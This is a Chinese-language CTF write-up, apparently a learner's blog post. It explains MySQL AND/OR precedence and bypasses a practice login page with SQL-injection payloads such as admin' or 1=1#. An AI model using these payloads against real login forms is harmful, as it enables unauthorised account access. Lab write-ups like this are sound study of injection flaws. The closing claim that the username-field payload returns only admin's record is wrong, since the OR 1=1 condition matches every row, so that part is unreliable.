前言：

觉得这个题目挺有意义的，因为最近在学数据库，但是不知道在现实中有什么应用，所以学起来也没有什么兴趣，做了这个题目，发现数据库还是挺有用处的，哈哈

知识点：

mysql 中and和or的优先级

（）> and  >  or

sql="select * from DB where user_id=1 or user_name='张三' and birthday='2000-03-03'"

1.该条sql 表示从 DB 中查询出  user_id =1 或者 (user_name='张三' 并且 birthday='2000-03-03') 的数据

sql="select * from DB where （user_id=1 or user_name='张三'） and birthday='2000-03-03'"

2.该条sql 表示查询表示（user_id =1 或者 user_name='张三'）并且 birthday='2000-03-03'）

 因为 （） 的优先级会比 and 和 or 高  所以会先执行 （）里的
 

解题过程：

打开靶机后发现是一个登录界面，需要输入用户名和密码

先看看只输入用户民admin看看有什么报错

然后只输入密码也是同样的报错，所以用户名和密码都必须有值才能进行sql语句验证

判断是什么闭合

输入用户名admin'和admin

发现一个sql报错信息， 得知是''闭合

猜测后台的sql语句如下：

sql="select * from user where username='$username&'and password='$password&'"

然后使用万能密码看看能不能登录admin账户

payload：
用户名：admin
密码：admin' or 1=1# 

然后就出flag了

万能密码的原理是利用or和and的优先级来使得后面的where子句为真

我们输入的payload放入sql语句中就是这样的：

sql="select * from user where username='admin'and password='admin' or 1=1#'"

意思是：查询（用户名为admin并且password=admin）或者1=1的数据 #把后面的给注释掉了

因为1=1恒真，所以where子句后面恒真，所以就会输出所有用户的信息。

如果想只输出admin的信息可以使用：

payload：
用户名：admin ' or 1=1#
密码：admin

输入的payload放入sql语句中就是这样的：

sql="select * from user where username='admin' or 1=1#'and password='admin'" 

意思是：查询username=admin或者1=1，#把后面注释掉了，所以不用管。

这样就只会输出admin的信息。